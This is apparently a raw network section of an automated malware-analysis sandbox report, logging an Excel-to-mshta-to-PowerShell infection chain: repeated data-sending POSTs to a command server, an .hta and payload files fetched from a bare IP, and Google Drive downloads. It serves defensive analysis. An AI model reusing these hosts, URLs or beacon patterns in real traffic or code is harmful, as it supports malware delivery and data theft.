          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: global trafficHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 149Connection: close
          Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49168 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49169 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49175 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49176 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899F4B14 URLDownloadToFileW,5_2_000007FE899F4B14
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA1E97D.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /66/gb/greatthingswithmegood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.151Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /66/gb/greatthingswithmegood.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 198.46.178.151If-Range: "2a437-625aa58b90e12"
          Source: global trafficHTTP traffic detected: GET /66/seemethebestthingswithgreatneedswithgoodformewith.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.151Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /66/gb/greatthingswithmegood.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 30 Oct 2024 04:43:43 GMTConnection: Keep-AliveHost: 198.46.178.151If-None-Match: "2a437-625aa58b90e12"
          Source: global trafficHTTP traffic detected: GET /66/LLORG.txt HTTP/1.1Host: 198.46.178.151Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /66/LLORG.txt HTTP/1.1Host: 198.46.178.151Connection: Keep-Alive
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: acesso.run
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: unknownHTTP traffic detected: POST /logs/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F0B98DE8Content-Length: 176Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
